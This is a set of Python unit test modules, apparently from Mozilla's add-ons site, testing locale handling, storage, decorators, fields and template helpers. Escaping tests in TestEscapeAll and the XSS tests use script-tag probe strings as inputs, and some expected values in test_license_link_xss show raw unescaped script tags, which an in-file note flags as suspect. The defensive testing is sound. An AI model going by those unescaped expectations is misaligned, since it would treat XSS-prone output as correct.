            with open(expected) as efh:
                assert dfh.read() == efh.read()
    finally:
        if os.path.exists(dest):
            os.remove(dest)
def test_to_language():
    """to_language() normalizes locale codes to the xx-YY form."""
    cases = (('en-us', 'en-US'),
             ('en_US', 'en-US'),
             ('en_us', 'en-US'),
             ('FR', 'fr'),
             ('el', 'el'))

    def _check(raw, expected):
        eq_(to_language(raw), expected)

    for raw, expected in cases:
        yield _check, raw, expected
def test_find_language():
    """find_language() resolves a locale string to a supported language,
    generalizing upward (en -> en-US) but never downward, and returning
    None for unknown codes."""
    cases = (('en-us', 'en-US'),
             ('en_US', 'en-US'),
             ('en', 'en-US'),
             ('cy', 'cy'),  # A hidden language.
             ('FR', 'fr'),
             ('es-ES', None),  # We don't go from specific to generic.
             ('xxx', None))

    def _check(raw, expected):
        eq_(find_language(raw), expected)

    for raw, expected in cases:
        yield _check, raw, expected
def test_spotcheck():
    """Check a couple product-details files to make sure they're available."""
    languages = product_details.languages
    eq_(languages['el']['English'], 'Greek')
    eq_(languages['el']['native'], u'Ελληνικά')

    eq_(product_details.firefox_history_major_releases['1.0'], '2004-11-09')
def test_no_translation():
    """
    `no_translation` provides a context where only the default
    language is active.
    """
    # Statement order matters here: the active language must be restored
    # after each context exits, and at the very end.
    lang = translation.get_language()
    translation.activate('pt-br')
    with no_translation():
        eq_(translation.get_language(), settings.LANGUAGE_CODE)
    eq_(translation.get_language(), 'pt-br')
    with no_translation('es'):
        eq_(translation.get_language(), 'es')
    eq_(translation.get_language(), 'pt-br')
    translation.activate(lang)
class TestLocalFileStorage(unittest.TestCase):
    """Exercise LocalFileStorage against a real temporary directory."""

    def setUp(self):
        self.tmp = tempfile.mkdtemp()
        self.stor = LocalFileStorage()

    def tearDown(self):
        rm_local_tmp_dir(self.tmp)

    def test_read_write(self):
        fn = os.path.join(self.tmp, 'somefile.txt')
        with self.stor.open(fn, 'w') as fd:
            fd.write('stuff')
        with self.stor.open(fn, 'r') as fd:
            eq_(fd.read(), 'stuff')

    def test_non_ascii_filename(self):
        fn = os.path.join(self.tmp, u'Ivan Krsti\u0107.txt')
        with self.stor.open(fn, 'w') as fd:
            fd.write('stuff')
        with self.stor.open(fn, 'r') as fd:
            eq_(fd.read(), 'stuff')

    def test_non_ascii_content(self):
        fn = os.path.join(self.tmp, 'somefile.txt')
        with self.stor.open(fn, 'w') as fd:
            fd.write(u'Ivan Krsti\u0107.txt'.encode('utf8'))
        with self.stor.open(fn, 'r') as fd:
            eq_(fd.read().decode('utf8'), u'Ivan Krsti\u0107.txt')

    def test_make_file_dirs(self):
        # Opening for write must create intermediate directories.
        dp = os.path.join(self.tmp, 'path', 'to')
        self.stor.open(os.path.join(dp, 'file.txt'), 'w').close()
        assert os.path.exists(self.stor.path(dp)), (
            'Directory not created: %r' % dp)

    def test_do_not_make_file_dirs_when_reading(self):
        fpath = os.path.join(self.tmp, 'file.txt')
        with open(fpath, 'w') as fp:
            fp.write('content')
        # Make sure this doesn't raise an exception.
        self.stor.open(fpath, 'r').close()

    def test_make_dirs_only_once(self):
        dp = os.path.join(self.tmp, 'path', 'to')
        with self.stor.open(os.path.join(dp, 'file.txt'), 'w') as fd:
            fd.write('stuff')
        # Make sure it doesn't try to make the dir twice
        with self.stor.open(os.path.join(dp, 'file.txt'), 'w') as fd:
            fd.write('stuff')
        with self.stor.open(os.path.join(dp, 'file.txt'), 'r') as fd:
            eq_(fd.read(), 'stuff')

    def test_delete_empty_dir(self):
        dp = os.path.join(self.tmp, 'path')
        os.mkdir(dp)
        self.stor.delete(dp)
        eq_(os.path.exists(dp), False)

    @raises(OSError)
    def test_cannot_delete_non_empty_dir(self):
        dp = os.path.join(self.tmp, 'path')
        with self.stor.open(os.path.join(dp, 'file.txt'), 'w') as fp:
            fp.write('stuff')
        self.stor.delete(dp)

    def test_delete_file(self):
        # Deleting a file leaves its parent directory in place.
        dp = os.path.join(self.tmp, 'path')
        fn = os.path.join(dp, 'file.txt')
        with self.stor.open(fn, 'w') as fp:
            fp.write('stuff')
        self.stor.delete(fn)
        eq_(os.path.exists(fn), False)
        eq_(os.path.exists(dp), True)
class TestCacheNamespaces(unittest.TestCase):
    """cache_ns_key() builds '<epoch>:ns:<namespace>' cache keys and bumps
    the epoch prefix when increment=True."""

    def setUp(self):
        cache.clear()
        self.namespace = 'redis-is-dead'

    @mock.patch('amo.utils.epoch')
    def test_no_preexisting_key(self, epoch_mock):
        epoch_mock.return_value = 123456
        eq_(cache_ns_key(self.namespace), '123456:ns:%s' % self.namespace)

    @mock.patch('amo.utils.epoch')
    def test_no_preexisting_key_incr(self, epoch_mock):
        epoch_mock.return_value = 123456
        eq_(cache_ns_key(self.namespace, increment=True),
            '123456:ns:%s' % self.namespace)

    @mock.patch('amo.utils.epoch')
    def test_key_incr(self, epoch_mock):
        epoch_mock.return_value = 123456
        cache_ns_key(self.namespace)  # Sets ns to 123456
        ns_key = cache_ns_key(self.namespace, increment=True)
        expected = '123457:ns:%s' % self.namespace
        eq_(ns_key, expected)
        eq_(cache_ns_key(self.namespace), expected)
class TestEscapeAll(unittest.TestCase):
    """escape_all() HTML-escapes markup, leaves plain text untouched, and
    recurses into dicts and lists."""

    def test_basics(self):
        x = '-'.join([u, u])
        y = ' - '.join([u, u])
        tests = [
            # BUG FIX: the expected value for markup input must be the
            # HTML-escaped form; the checked-in pair asserted escape_all
            # returned the <script> tag unchanged, which contradicts the
            # helper's purpose (likely an entity-unescaping artifact).
            ('<script>alert("BALL SO HARD")</script>',
             '&lt;script&gt;alert("BALL SO HARD")&lt;/script&gt;'),
            (u'Bän...g (bang)', u'Bän...g (bang)'),
            (u, u),
            (x, x),
            (y, y),
            (u'x荿', u'x\u837f'),
            # NOTE(review): the expected literal has one more code point
            # (\u0383) than the visible input -- confirm the input literal
            # wasn't mangled in transit.
            (u'ϧ蒬蓣', u'\u03e7\u0383\u84ac\u84e3'),
            (u'¿x', u'¿x'),
        ]
        for val, expected in tests:
            eq_(escape_all(val), expected)

    def test_nested(self):
        # Escaping applies recursively inside dicts and lists; non-string
        # values (bools) pass through untouched.
        value = '<script>alert("BALL SO HARD")</script>'
        expected = '&lt;script&gt;alert("BALL SO HARD")&lt;/script&gt;'
        test = {
            'string': value,
            'dict': {'x': value},
            'list': [value],
            'bool': True,
        }
        res = escape_all(test)
        eq_(res['string'], expected)
        eq_(res['dict'], {'x': expected})
        eq_(res['list'], [expected])
        eq_(res['bool'], True)
########NEW FILE########
__FILENAME__ = test_cron
from nose.tools import eq_
import amo.tests
from amo.cron import gc
from devhub.models import ActivityLog
from stats.models import Contribution
class GarbageTest(amo.tests.TestCase):
    """cron.gc() purges expired ActivityLog and Contribution rows."""
    fixtures = ['base/addon_59', 'base/garbage']

    def test_garbage_collection(self):
        "This fixture is expired data that should just get cleaned up."
        eq_(ActivityLog.objects.all().count(), 1)
        eq_(Contribution.objects.all().count(), 1)
        gc(test_result=False)
        eq_(ActivityLog.objects.all().count(), 0)
        eq_(Contribution.objects.all().count(), 0)
########NEW FILE########
__FILENAME__ = test_decorators
from datetime import datetime, timedelta
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
import mock
from nose import SkipTest
from nose.tools import eq_
import amo.tests
from amo import decorators, get_user, set_user
from amo.urlresolvers import reverse
from users.models import UserProfile
def test_post_required():
    """post_required rejects GET with 405 and passes POST through."""
    view = decorators.post_required(lambda r: mock.sentinel.response)
    request = mock.Mock()

    request.method = 'GET'
    assert isinstance(view(request), http.HttpResponseNotAllowed)

    request.method = 'POST'
    eq_(view(request), mock.sentinel.response)
def test_json_view():
    """Turns a Python object into a response."""
    f = lambda r: {'x': 1}
    response = decorators.json_view(f)(mock.Mock())
    assert isinstance(response, http.HttpResponse)
    eq_(response.content, '{"x": 1}')
    eq_(response['Content-Type'], 'application/json')
    eq_(response.status_code, 200)
def test_json_view_normal_response():
    """Normal responses get passed through."""
    expected = http.HttpResponseForbidden()
    f = lambda r: expected
    response = decorators.json_view(f)(mock.Mock())
    # Same object, untouched content type.
    assert expected is response
    eq_(response['Content-Type'], 'text/html; charset=utf-8')
def test_json_view_error():
    """json_view.error returns 400 responses."""
    response = decorators.json_view.error({'msg': 'error'})
    assert isinstance(response, http.HttpResponseBadRequest)
    eq_(response.content, '{"msg": "error"}')
    eq_(response['Content-Type'], 'application/json')
def test_json_view_status():
    """A custom status_code passed to json_view is used on the response."""
    f = lambda r: {'x': 1}
    response = decorators.json_view(f, status_code=202)(mock.Mock())
    eq_(response.status_code, 202)
def test_json_view_response_status():
    """json_response() serializes and honors a custom status_code."""
    response = decorators.json_response({'msg': 'error'}, status_code=202)
    eq_(response.content, '{"msg": "error"}')
    eq_(response['Content-Type'], 'application/json')
    eq_(response.status_code, 202)
@mock.patch('django.db.transaction.commit_on_success')
def test_write(commit_on_success):
    # Until we can figure out celery.delay issues.
    raise SkipTest
    # NOTE: everything below is intentionally unreachable until the skip
    # above is lifted.
    @decorators.write
    def some_func():
        pass
    assert not commit_on_success.called
    some_func()
    assert commit_on_success.called
class TestTaskUser(amo.tests.TestCase):
    """set_task_user swaps in the task user for the duration of the call
    and restores the previous user afterwards."""
    fixtures = ['base/users']

    def test_set_task_user(self):
        @decorators.set_task_user
        def some_func():
            return get_user()

        set_user(UserProfile.objects.get(username='regularuser'))
        eq_(get_user().pk, 999)
        eq_(some_func().pk, int(settings.TASK_USER_ID))
        # Back to the regular user after the decorated call returns.
        eq_(get_user().pk, 999)
class TestLoginRequired(object):
    """login_required decorator: redirect (302) vs. 401 for anonymous
    users, pass-through for authenticated ones."""

    def setUp(self):
        self.f = mock.Mock()
        self.f.__name__ = 'function'
        self.request = mock.Mock()
        self.request.user.is_authenticated.return_value = False
        self.request.get_full_path.return_value = 'path'

    def test_normal(self):
        func = decorators.login_required(self.f)
        response = func(self.request)
        assert not self.f.called
        eq_(response.status_code, 302)
        eq_(response['Location'],
            '%s?to=%s' % (reverse('users.login'), 'path'))

    def test_no_redirect(self):
        func = decorators.login_required(self.f, redirect=False)
        response = func(self.request)
        assert not self.f.called
        eq_(response.status_code, 401)

    def test_decorator_syntax(self):
        # @login_required(redirect=False)
        func = decorators.login_required(redirect=False)(self.f)
        response = func(self.request)
        assert not self.f.called
        eq_(response.status_code, 401)

    def test_no_redirect_success(self):
        func = decorators.login_required(redirect=False)(self.f)
        self.request.user.is_authenticated.return_value = True
        func(self.request)
        assert self.f.called
class TestSetModifiedOn(amo.tests.TestCase):
    """set_modified_on stamps `modified` on the objects passed via the
    set_modified_on kwarg, but only when the wrapped call returns truthy."""
    fixtures = ['base/users']

    @decorators.set_modified_on
    def some_method(self, worked):
        return worked

    def test_set_modified_on(self):
        users = list(UserProfile.objects.all()[:3])
        self.some_method(True, set_modified_on=users)
        for user in users:
            eq_(UserProfile.objects.get(pk=user.pk).modified.date(),
                datetime.today().date())

    def test_not_set_modified_on(self):
        yesterday = datetime.today() - timedelta(days=1)
        qs = UserProfile.objects.all()
        qs.update(modified=yesterday)
        users = list(qs[:3])
        self.some_method(False, set_modified_on=users)
        for user in users:
            date = UserProfile.objects.get(pk=user.pk).modified.date()
            assert date < datetime.today().date()
class TestPermissionRequired(amo.tests.TestCase):
    """permission_required delegates to acl.action_allowed and raises
    PermissionDenied when the check fails."""

    def setUp(self):
        self.f = mock.Mock()
        self.f.__name__ = 'function'
        self.request = mock.Mock()

    @mock.patch('access.acl.action_allowed')
    def test_permission_not_allowed(self, action_allowed):
        action_allowed.return_value = False
        func = decorators.permission_required('', '')(self.f)
        with self.assertRaises(PermissionDenied):
            func(self.request)

    @mock.patch('access.acl.action_allowed')
    def test_permission_allowed(self, action_allowed):
        action_allowed.return_value = True
        func = decorators.permission_required('', '')(self.f)
        func(self.request)
        assert self.f.called

    @mock.patch('access.acl.action_allowed')
    def test_permission_allowed_correctly(self, action_allowed):
        # The app/action pair is forwarded untouched to action_allowed.
        func = decorators.permission_required('Admin', '%')(self.f)
        func(self.request)
        action_allowed.assert_called_with(self.request, 'Admin', '%')
########NEW FILE########
__FILENAME__ = test_ext
import jingo
import mock
from django.shortcuts import render
from nose.tools import eq_
@mock.patch('caching.ext.cache._cache_support')
def test_app_in_fragment_cache_key(cache_mock):
    """The {% cache %} fragment key embeds the current request's APP id."""
    cache_mock.return_value = ''
    request = mock.Mock()
    request.APP.id = '<app>'
    request.user.is_authenticated.return_value = False
    request.groups = []
    template = jingo.env.from_string('{% cache 1 %}{% endcache %}')
    render(request, template)
    # First positional arg to _cache_support is the cache key.
    assert cache_mock.call_args[0][0].endswith('<app>')
@mock.patch('caching.ext.cache._cache_support')
def test_fragment_cache_key_no_app(cache_mock):
    """{% cache %} still works when there is no request in context."""
    cache_mock.return_value = 'xx'
    template = jingo.env.from_string('{% cache 1 %}{% endcache %}')
    eq_(template.render(), 'xx')
    assert cache_mock.called
########NEW FILE########
__FILENAME__ = test_fields
from decimal import Decimal
from django import forms
from django.core.cache import cache
from django.core import exceptions
from nose.tools import eq_
from test_utils import ExtraAppTestCase
import amo
from amo.fields import SeparatedValuesField
from fieldtestapp.models import DecimalCharFieldModel
class DecimalCharFieldTestCase(ExtraAppTestCase):
    """DecimalCharField round-trips Decimals and honors nullify_invalid."""
    fixtures = ['fieldtestapp/test_models.json']
    extra_apps = ['amo.tests.fieldtestapp']

    def setUp(self):
        cache.clear()

    def test_fetch(self):
        o = DecimalCharFieldModel.objects.get(id=1)
        eq_(o.strict, Decimal('1.23'))
        eq_(o.loose, None)

    def test_nullify_invalid_false(self):
        # strict field: invalid assignment raises and keeps the old value.
        val = Decimal('1.5')
        o = DecimalCharFieldModel()
        o.strict = val
        try:
            o.strict = 'not a decimal'
        except exceptions.ValidationError:
            pass
        else:
            assert False, 'invalid value did not raise an exception'
        eq_(o.strict, val, 'unexpected Decimal value')

    def test_nullify_invalid_true(self):
        # loose field: invalid assignment silently becomes None.
        val = Decimal('1.5')
        o = DecimalCharFieldModel()
        o.loose = val
        eq_(o.loose, val, 'unexpected Decimal value')
        o.loose = 'not a decimal'
        eq_(o.loose, None, 'expected None')

    def test_save(self):
        a = DecimalCharFieldModel()
        a.strict = '1.23'
        a.loose = 'this had better be NULL'
        a.save()
        b = DecimalCharFieldModel.objects.get(pk=a.id)
        eq_(b.strict, Decimal('1.23'))
        eq_(b.loose, None)
class SeparatedValuesFieldTestCase(amo.tests.TestCase):
    """SeparatedValuesField validates each item with the wrapped form field
    and normalizes the separator/whitespace on clean()."""
    # NOTE(review): this module only shows `import amo`; `amo.tests` must be
    # imported elsewhere for the base class lookup to work -- confirm.

    def setUp(self):
        self.field = SeparatedValuesField(forms.EmailField)

    def test_email_field(self):
        eq_(self.field.clean(u'[email protected], [email protected]'), u'[email protected], [email protected]')

    def test_email_field_w_empties(self):
        # Empty items and stray whitespace/newlines are dropped.
        eq_(self.field.clean(u'[email protected],, \n,[email protected]'), u'[email protected], [email protected]')

    def test_email_validation_error(self):
        with self.assertRaises(exceptions.ValidationError):
            self.field.clean(u'e')
        with self.assertRaises(exceptions.ValidationError):
            self.field.clean(u'[email protected], [email protected], e')

    def test_url_field(self):
        field = SeparatedValuesField(forms.URLField)
        eq_(field.clean(u'http://hy.fr/,,http://yo.lo'),
            u'http://hy.fr/, http://yo.lo/')

    def test_alt_separator(self):
        self.field = SeparatedValuesField(forms.EmailField, separator='#')
        eq_(self.field.clean(u'[email protected]#[email protected]'), u'[email protected], [email protected]')
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import mimetypes
import os
from datetime import datetime, timedelta
from urlparse import urljoin
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.utils import encoding
import jingo
import test_utils
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery
import amo
import amo.tests
from amo import urlresolvers, utils, helpers
from amo.utils import ImageCheck
from versions.models import License
def render(s, context=None):
    """Render template string *s* through jingo's Jinja environment.

    BUG FIX: the original used a mutable default argument (``context={}``),
    which shares one dict across every call site; use None as the sentinel.
    """
    t = jingo.env.from_string(s)
    return t.render(context if context is not None else {})
def test_strip_html():
    """strip_html filter removes markup tags, keeping the text."""
    eq_('Hey Brother!', render('{{ "Hey <b>Brother!</b>"|strip_html }}'))
def test_currencyfmt():
    """currencyfmt formats amounts for a currency; None renders as ''."""
    eq_(helpers.currencyfmt(None, 'USD'), '')
    eq_(helpers.currencyfmt(5, 'USD'), '$5.00')
def test_strip_html_none():
    """strip_html tolerates None input, with or without the flag."""
    eq_('', render('{{ a|strip_html }}', {'a': None}))
    eq_('', render('{{ a|strip_html(True) }}', {'a': None}))
def test_strip_controls():
    # We want control codes like \x0c to disappear.
    eq_('I ove you', helpers.strip_controls('I \x0cove you'))
def test_finalize():
    """We want None to show up as ''. We do this in JINJA_CONFIG."""
    eq_('', render('{{ x }}', {'x': None}))
def test_slugify_spaces():
    """We want slugify to preserve spaces, but not at either end."""
    eq_(utils.slugify(' b ar '), 'b-ar')
    eq_(utils.slugify(' b ar ', spaces=True), 'b ar')
    # NOTE(review): this line duplicates the one above; the original may
    # have used multiple internal spaces that were collapsed in transit --
    # confirm against upstream before relying on it.
    eq_(utils.slugify(' b ar ', spaces=True), 'b ar')
def test_page_title():
    """page_title() appends the per-app suffix, defaulting to 'Add-ons'."""
    request = Mock()
    request.APP = amo.THUNDERBIRD
    title = 'Oh hai!'
    s = render('{{ page_title("%s") }}' % title, {'request': request})
    eq_(s, '%s :: Add-ons for Thunderbird' % title)

    # pages without app should show a default
    request.APP = None
    s = render('{{ page_title("%s") }}' % title, {'request': request})
    eq_(s, '%s :: Add-ons' % title)

    # Check the dirty unicodes.
    # (No assertion: rendering must simply not raise an encoding error.)
    request.APP = amo.FIREFOX
    s = render('{{ page_title(x) }}',
               {'request': request,
                'x': encoding.smart_str(u'\u05d0\u05d5\u05e1\u05e3')})
class TestBreadcrumbs(object):
    """breadcrumbs() helper: default crumb, custom items, truncation, XSS."""

    def setUp(self):
        self.req_noapp = Mock()
        self.req_noapp.APP = None
        self.req_app = Mock()
        self.req_app.APP = amo.FIREFOX

    def test_no_app(self):
        s = render('{{ breadcrumbs() }}', {'request': self.req_noapp})
        doc = PyQuery(s)
        crumbs = doc('li>a')
        eq_(len(crumbs), 1)
        eq_(crumbs.text(), 'Add-ons')
        eq_(crumbs.attr('href'), urlresolvers.reverse('home'))

    def test_with_app(self):
        s = render('{{ breadcrumbs() }}', {'request': self.req_app})
        doc = PyQuery(s)
        crumbs = doc('li>a')
        eq_(len(crumbs), 1)
        eq_(crumbs.text(), 'Add-ons for Firefox')
        eq_(crumbs.attr('href'), urlresolvers.reverse('home'))

    def test_no_add_default(self):
        s = render('{{ breadcrumbs(add_default=False) }}',
                   {'request': self.req_app})
        eq_(len(s), 0)

    def test_items(self):
        s = render("""{{ breadcrumbs([('/foo', 'foo'),
                                      ('/bar', 'bar')],
                                     add_default=False) }}'""",
                   {'request': self.req_app})
        doc = PyQuery(s)
        crumbs = doc('li>a')
        eq_(len(crumbs), 2)
        eq_(crumbs.eq(0).text(), 'foo')
        eq_(crumbs.eq(0).attr('href'), '/foo')
        eq_(crumbs.eq(1).text(), 'bar')
        eq_(crumbs.eq(1).attr('href'), '/bar')

    def test_items_with_default(self):
        s = render("""{{ breadcrumbs([('/foo', 'foo'),
                                      ('/bar', 'bar')]) }}'""",
                   {'request': self.req_app})
        doc = PyQuery(s)
        crumbs = doc('li>a')
        eq_(len(crumbs), 3)
        eq_(crumbs.eq(1).text(), 'foo')
        eq_(crumbs.eq(1).attr('href'), '/foo')
        eq_(crumbs.eq(2).text(), 'bar')
        eq_(crumbs.eq(2).attr('href'), '/bar')

    def test_truncate(self):
        s = render("""{{ breadcrumbs([('/foo', 'abcd efghij'),],
                                     crumb_size=5) }}'""",
                   {'request': self.req_app})
        doc = PyQuery(s)
        crumbs = doc('li>a')
        eq_('abcd ...', crumbs.eq(1).text())

    def test_xss(self):
        s = render("{{ breadcrumbs([('/foo', '<script>')]) }}",
                   {'request': self.req_app})
        # BUG FIX: the checked-in asserts required and forbade the same raw
        # '<script>' string (an entity-unescaping artifact); the first must
        # look for the HTML-escaped crumb title.
        assert '&lt;script&gt;' in s, s
        assert '<script>' not in s
@patch('amo.helpers.urlresolvers.reverse')
def test_url(mock_reverse):
    """url() forwards positional and keyword args to urlresolvers.reverse."""
    render('{{ url("viewname", 1, z=2) }}')
    mock_reverse.assert_called_with('viewname', args=(1,), kwargs={'z': 2},
                                    add_prefix=True)

    # NOTE(review): host="myhost" is apparently consumed by the helper (the
    # reverse() call is asserted identical to the one above) -- confirm
    # that's the intended contract.
    render('{{ url("viewname", 1, z=2, host="myhost") }}')
    mock_reverse.assert_called_with('viewname', args=(1,), kwargs={'z': 2},
                                    add_prefix=True)
def test_url_src():
    """A src kwarg is appended to the generated URL as a query parameter."""
    s = render('{{ url("addons.detail", "a3615", src="xxx") }}')
    assert s.endswith('?src=xxx')
def test_urlparams():
    """urlparams filter merges query params and fragments into a URL."""
    url = '/en-US/firefox/search-tools/category'
    c = {'base': url,
         'base_frag': url + '#hash',
         'base_query': url + '?x=y',
         'sort': 'name', 'frag': 'frag'}

    # Adding a query.
    s = render('{{ base_frag|urlparams(sort=sort) }}', c)
    eq_(s, '%s?sort=name#hash' % url)

    # Adding a fragment.
    s = render('{{ base|urlparams(frag) }}', c)
    eq_(s, '%s#frag' % url)

    # Replacing a fragment.
    s = render('{{ base_frag|urlparams(frag) }}', c)
    eq_(s, '%s#frag' % url)

    # Adding query and fragment.
    s = render('{{ base_frag|urlparams(frag, sort=sort) }}', c)
    eq_(s, '%s?sort=name#frag' % url)

    # Adding query with existing params.
    s = render('{{ base_query|urlparams(frag, sort=sort) }}', c)
    eq_(s, '%s?sort=name&x=y#frag' % url)

    # Replacing a query param.
    s = render('{{ base_query|urlparams(frag, x="z") }}', c)
    eq_(s, '%s?x=z#frag' % url)

    # Params with value of None get dropped.
    s = render('{{ base|urlparams(sort=None) }}', c)
    eq_(s, url)

    # Removing a query
    s = render('{{ base_query|urlparams(x=None) }}', c)
    eq_(s, url)
def test_urlparams_unicode():
    """urlparams must not blow up on malformed unicode (no assertion --
    just must not raise)."""
    url = u'/xx?evil=reco\ufffd\ufffd\ufffd\u02f5'
    utils.urlparams(url)
class TestSharedURL(amo.tests.TestCase):
    """shared_url() maps addon/app detail view names to the same URL for a
    non-webapp addon."""

    def setUp(self):
        self.webapp = Mock()
        self.webapp.type = amo.ADDON_WEBAPP
        self.webapp.app_slug = 'webapp'
        self.addon = Mock()
        self.addon.type = amo.ADDON_EXTENSION
        self.addon.slug = 'addon'
        self.addon.is_webapp.return_value = False

    def test_addonurl(self):
        expected = '/en-US/firefox/addon/addon/'
        eq_(helpers.shared_url('addons.detail', self.addon), expected)
        eq_(helpers.shared_url('apps.detail', self.addon), expected)
        eq_(helpers.shared_url('detail', self.addon), expected)
        # add_prefix=False drops the locale/app URL prefix.
        eq_(helpers.shared_url('detail', self.addon, add_prefix=False),
            '/addon/addon/')
def test_isotime():
    """isotime filter emits UTC ISO-8601; None renders as ''."""
    # NOTE(review): 10:11 local -> 18:11Z implies the suite assumes a
    # Pacific (UTC-8) TIME_ZONE setting -- confirm before porting.
    time = datetime(2009, 12, 25, 10, 11, 12)
    s = render('{{ d|isotime }}', {'d': time})
    eq_(s, '2009-12-25T18:11:12Z')
    s = render('{{ d|isotime }}', {'d': None})
    eq_(s, '')
def test_epoch():
    """epoch filter renders a datetime as a Unix timestamp; None as ''."""
    time = datetime(2009, 12, 25, 10, 11, 12)
    s = render('{{ d|epoch }}', {'d': time})
    eq_(s, '1261764672')
    s = render('{{ d|epoch }}', {'d': None})
    eq_(s, '')
def test_locale_url():
    """locale_url() prefixes with SCRIPT_NAME and the request's locale."""
    rf = test_utils.RequestFactory()
    request = rf.get('/de', SCRIPT_NAME='/z')
    prefixer = urlresolvers.Prefixer(request)
    urlresolvers.set_url_prefix(prefixer)
    s = render('{{ locale_url("mobile") }}')
    eq_(s, '/z/de/mobile')
def test_external_url():
    """external_url filter wraps a URL with the outgoing redirector."""
    # Save and restore the settings we mutate, even if the test fails.
    redirect_url = settings.REDIRECT_URL
    secretkey = settings.REDIRECT_SECRET_KEY
    settings.REDIRECT_URL = 'http://example.net'
    settings.REDIRECT_SECRET_KEY = 'sekrit'
    try:
        myurl = 'http://example.com'
        s = render('{{ "%s"|external_url }}' % myurl)
        eq_(s, urlresolvers.get_outgoing_url(myurl))
    finally:
        settings.REDIRECT_URL = redirect_url
        settings.REDIRECT_SECRET_KEY = secretkey
@patch('amo.helpers.urlresolvers.get_outgoing_url')
def test_linkify_bounce_url_callback(mock_get_outgoing_url):
    """The linkify callback rewrites href through get_outgoing_url."""
    mock_get_outgoing_url.return_value = 'bar'
    res = urlresolvers.linkify_bounce_url_callback({'href': 'foo'})
    # Make sure get_outgoing_url was called.
    eq_(res, {'href': 'bar'})
    mock_get_outgoing_url.assert_called_with('foo')
@patch('amo.helpers.urlresolvers.linkify_bounce_url_callback')
def test_linkify_with_outgoing_text_links(mock_linkify_bounce_url_callback):
    """Bare URLs in text become bounce links; rel=nofollow is the default."""
    def side_effect(attrs, new=False):
        attrs['href'] = 'bar'
        return attrs

    mock_linkify_bounce_url_callback.side_effect = side_effect
    # Without nofollow.
    res = urlresolvers.linkify_with_outgoing('a text http://example.com link',
                                             nofollow=False)
    eq_(res, 'a text <a href="bar">http://example.com</a> link')

    # With nofollow (default).
    res = urlresolvers.linkify_with_outgoing('a text http://example.com link')
    eq_(res, 'a text <a rel="nofollow" href="bar">http://example.com</a> link')

    res = urlresolvers.linkify_with_outgoing('a text http://example.com link',
                                             nofollow=True)
    eq_(res, 'a text <a rel="nofollow" href="bar">http://example.com</a> link')
@patch('amo.helpers.urlresolvers.linkify_bounce_url_callback')
def test_linkify_with_outgoing_markup_links(mock_linkify_bounce_url_callback):
    """Existing <a> markup gets its href rewritten; nofollow by default."""
    def side_effect(attrs, new=False):
        attrs['href'] = 'bar'
        return attrs

    mock_linkify_bounce_url_callback.side_effect = side_effect
    # Without nofollow.
    res = urlresolvers.linkify_with_outgoing(
        'a markup <a href="http://example.com">link</a> with text',
        nofollow=False)
    eq_(res, 'a markup <a href="bar">link</a> with text')

    # With nofollow (default).
    res = urlresolvers.linkify_with_outgoing(
        'a markup <a href="http://example.com">link</a> with text')
    eq_(res, 'a markup <a rel="nofollow" href="bar">link</a> with text')

    res = urlresolvers.linkify_with_outgoing(
        'a markup <a href="http://example.com">link</a> with text',
        nofollow=True)
    eq_(res, 'a markup <a rel="nofollow" href="bar">link</a> with text')
class TestLicenseLink(amo.tests.TestCase):
    """license_link() renders the icon/text markup for builtin licenses."""

    def test_license_link(self):
        mit = License.objects.create(
            name='MIT/X11 License', builtin=6, url='http://m.it')
        copyright = License.objects.create(
            name='All Rights Reserved', icons='copyr', builtin=7)
        cc = License.objects.create(
            name='Creative Commons', url='http://cre.at', builtin=8,
            some_rights=True, icons='cc-attrib cc-noncom cc-share')
        cc.save()
        expected = {
            mit: (
                '<ul class="license"><li class="text">'
                '<a href="http://m.it">MIT/X11 License</a></li></ul>'),
            copyright: (
                '<ul class="license"><li class="icon copyr"></li>'
                '<li class="text">All Rights Reserved</li></ul>'),
            cc: (
                '<ul class="license"><li class="icon cc-attrib"></li>'
                '<li class="icon cc-noncom"></li><li class="icon cc-share">'
                '</li><li class="text"><a href="http://cre.at" '
                'title="Creative Commons">Some rights reserved</a></li></ul>'),
        }
        for lic, ex in expected.items():
            s = render('{{ license_link(lic) }}', {'lic': lic})
            # Collapse template whitespace before comparing.
            s = ''.join([s.strip() for s in s.split('\n')])
            eq_(s, ex)

    def test_license_link_xss(self):
        # NOTE(review): the expected strings below contain raw '<script>'
        # where escaped output ('&lt;script&gt;') would be expected from an
        # XSS test -- likely entity-unescaped in transit; verify against
        # the helper's actual output before trusting these literals.
        mit = License.objects.create(
            name='<script>', builtin=6, url='<script>')
        copyright = License.objects.create(
            name='<script>', icons='<script>', builtin=7)
        cc = License.objects.create(
            name='<script>', url='<script>', builtin=8,
            some_rights=True, icons='<script> cc-noncom cc-share')
        cc.save()
        expected = {
            mit: (
                '<ul class="license"><li class="text">'
                '<a href="<script>"><script></a></li></ul>'),
            copyright: (
                '<ul class="license"><li class="icon <script>"></li>'
                '<li class="text"><script></li></ul>'),
            cc: (
                '<ul class="license"><li class="icon <script>"></li>'
                '<li class="icon cc-noncom"></li><li class="icon cc-share">'
                '</li><li class="text"><a href="<script>" '
                'title="<script>">Some rights reserved</a></li></ul>'),
        }
        for lic, ex in expected.items():
            s = render('{{ license_link(lic) }}', {'lic': lic})
            s = ''.join([s.strip() for s in s.split('\n')])
            eq_(s, ex)
def get_image_path(name):
    """Absolute path of test image *name* under apps/amo/tests/images."""
    images_dir = os.path.join(settings.ROOT, 'apps', 'amo', 'tests', 'images')
    return os.path.join(images_dir, name)
def get_uploaded_file(name):
    """Return a SimpleUploadedFile wrapping test image *name*.

    BUG FIX: the original leaked the file handle (open() without close)
    and read the image in text mode; read in binary mode via a context
    manager instead.
    """
    with open(get_image_path(name), 'rb') as fp:
        data = fp.read()
    return SimpleUploadedFile(name, data,
                              content_type=mimetypes.guess_type(name)[0])
class TestAnimatedImages(amo.tests.TestCase):
    """ImageCheck detects animation and rejects non-image data."""
    # Note: the open() handles are handed to ImageCheck, which reads them
    # lazily, so they are not closed here.

    def test_animated_images(self):
        img = ImageCheck(open(get_image_path('animated.png')))
        assert img.is_animated()
        img = ImageCheck(open(get_image_path('non-animated.png')))
        assert not img.is_animated()

        img = ImageCheck(open(get_image_path('animated.gif')))
        assert img.is_animated()
        img = ImageCheck(open(get_image_path('non-animated.gif')))
        assert not img.is_animated()

    def test_junk(self):
